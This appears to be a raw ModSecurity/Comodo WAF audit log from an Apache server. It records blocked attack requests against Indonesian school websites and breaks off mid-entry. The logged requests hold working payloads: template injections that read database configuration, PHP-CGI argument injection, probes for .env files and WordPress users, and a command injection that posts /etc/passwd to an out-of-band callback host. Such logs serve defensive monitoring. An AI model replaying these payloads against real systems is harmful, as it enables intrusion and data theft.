(Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9aed371a-Z-- --370ab93e-A-- [23/May/2025:11:02:07 +0700] aC_zPx67_KloOut96EnfTgAAAI4 103.236.140.4 41828 103.236.140.4 8181 --370ab93e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.122 Safari/537.36 Accept-Charset: utf-8 --370ab93e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --370ab93e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747972927865377 860 (- - -) Stopwatch2: 1747972927865377 860; combined=343, p1=299, p2=0, p3=0, p4=0, p5=44, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --370ab93e-Z-- --2fef5d7d-A-- [23/May/2025:11:02:42 +0700] aC_zYlYzwfxII7zMfyHfXQAAAAI 103.236.140.4 41862 103.236.140.4 8181 --2fef5d7d-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 159433151 --2fef5d7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2fef5d7d-E-- --2fef5d7d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 154.26.179.43 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747972962625841 2351 (- - -) Stopwatch2: 1747972962625841 2351; combined=1106, p1=336, p2=744, p3=0, p4=0, p5=25, sr=53, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fef5d7d-Z-- --7a648939-A-- [23/May/2025:11:06:10 +0700] aC_0MlYzwfxII7zMfyHfaAAAAAM 103.236.140.4 41908 103.236.140.4 8181 --7a648939-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159433172 --7a648939-C-- --7a648939-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a648939-E-- --7a648939-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747973170124614 3715 (- - -) Stopwatch2: 1747973170124614 3715; combined=1983, p1=453, p2=1500, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a648939-Z-- --dfc86517-A-- [23/May/2025:11:06:11 +0700] aC_0M1YzwfxII7zMfyHfaQAAAAI 103.236.140.4 41912 103.236.140.4 8181 --dfc86517-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162995228 --dfc86517-C-- --dfc86517-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfc86517-E-- --dfc86517-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747973171534708 2754 (- - -) Stopwatch2: 1747973171534708 2754; combined=1468, p1=332, p2=1112, p3=0, p4=0, p5=24, sr=55, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc86517-Z-- --c1d9fd4f-A-- [23/May/2025:11:06:12 +0700] aC_0NG_WNRyhaqaKDLwi0gAAANc 103.236.140.4 41918 103.236.140.4 8181 --c1d9fd4f-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159433175 --c1d9fd4f-C-- --c1d9fd4f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1d9fd4f-E-- --c1d9fd4f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747973172288016 3632 (- - -) Stopwatch2: 1747973172288016 3632; combined=1746, p1=418, p2=1304, p3=0, p4=0, p5=24, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1d9fd4f-Z-- --4662960f-A-- [23/May/2025:11:06:13 +0700] aC_0NVYzwfxII7zMfyHfagAAAAU 103.236.140.4 41922 103.236.140.4 8181 --4662960f-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162995231 --4662960f-C-- --4662960f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4662960f-E-- --4662960f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747973173055048 3246 (- - -) Stopwatch2: 1747973173055048 3246; combined=1849, p1=414, p2=1406, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4662960f-Z-- --2cc93373-A-- [23/May/2025:11:22:24 +0700] aC_4AFYzwfxII7zMfyHfcwAAAAI 103.236.140.4 42028 103.236.140.4 8181 --2cc93373-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 134.209.152.33 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 134.209.152.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --2cc93373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2cc93373-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747974144575106 761 (- - -) Stopwatch2: 1747974144575106 761; combined=332, p1=291, p2=0, p3=0, p4=0, p5=41, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2cc93373-Z-- --fa1c3733-A-- [23/May/2025:11:46:23 +0700] aC_9nx67_KloOut96Ens6AAAAJA 103.236.140.4 44526 103.236.140.4 8181 --fa1c3733-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 162995350 --fa1c3733-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fa1c3733-E-- --fa1c3733-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 154.26.179.43 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747975583179968 4020 (- - -) Stopwatch2: 1747975583179968 4020; combined=2165, p1=622, p2=1499, p3=0, p4=0, p5=44, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa1c3733-Z-- --1c306556-A-- [23/May/2025:12:23:25 +0700] aDAGTW_WNRyhaqaKDLxbHwAAAMk 103.236.140.4 36916 103.236.140.4 8181 --1c306556-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 193 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159433393 --1c306556-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0mbkqa4kqtm561jt3n0yop9j7gakgbim.oast.fun) --1c306556-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c306556-E-- --1c306556-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747977805430011 2620 (- - -) Stopwatch2: 1747977805430011 2620; combined=1032, p1=662, p2=341, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c306556-Z-- --d7dbbf5d-A-- [23/May/2025:12:46:48 +0700] aDALyB67_KloOut96EkpHQAAAJI 103.236.140.4 57386 103.236.140.4 8181 --d7dbbf5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.195.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.195.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d7dbbf5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7dbbf5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747979208176536 3451 (- - -) Stopwatch2: 1747979208176536 3451; combined=1754, p1=513, p2=1199, p3=0, p4=0, p5=42, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7dbbf5d-Z-- --ca290e43-A-- [23/May/2025:13:04:17 +0700] aDAP4bz70bfNdlplZZMYFgAAAEk 103.236.140.4 38020 103.236.140.4 8181 --ca290e43-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ca290e43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca290e43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747980257626816 811 (- - -) Stopwatch2: 1747980257626816 811; combined=305, p1=269, p2=0, p3=0, p4=0, p5=35, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca290e43-Z-- --d1891b6f-A-- [23/May/2025:13:27:32 +0700] aDAVVG_WNRyhaqaKDLydxgAAANg 103.236.140.4 58072 103.236.140.4 8181 --d1891b6f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.34.2.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.34.2.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1891b6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1891b6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747981652140151 2498 (- - -) Stopwatch2: 1747981652140151 2498; combined=1257, p1=477, p2=748, p3=0, p4=0, p5=32, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1891b6f-Z-- --ab55ce66-A-- [23/May/2025:13:28:47 +0700] aDAVn7z70bfNdlplZZMyEgAAAFU 103.236.140.4 60702 103.236.140.4 8181 --ab55ce66-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.66.56.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.66.56.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab55ce66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab55ce66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747981727121959 2494 (- - -) Stopwatch2: 1747981727121959 2494; combined=1267, p1=406, p2=833, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab55ce66-Z-- --74cdb646-A-- [23/May/2025:13:30:11 +0700] aDAV87z70bfNdlplZZMzKwAAAEs 103.236.140.4 35410 103.236.140.4 8181 --74cdb646-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C202 Safari/604.1 Accept-Charset: utf-8 --74cdb646-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74cdb646-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747981811398730 905 (- - -) Stopwatch2: 1747981811398730 905; combined=379, p1=343, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74cdb646-Z-- --3be4f266-A-- [23/May/2025:14:04:36 +0700] aDAeBB67_KloOut96EmCcQAAAIc 103.236.140.4 51304 103.236.140.4 8181 --3be4f266-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.112.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.112.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3be4f266-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be4f266-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] 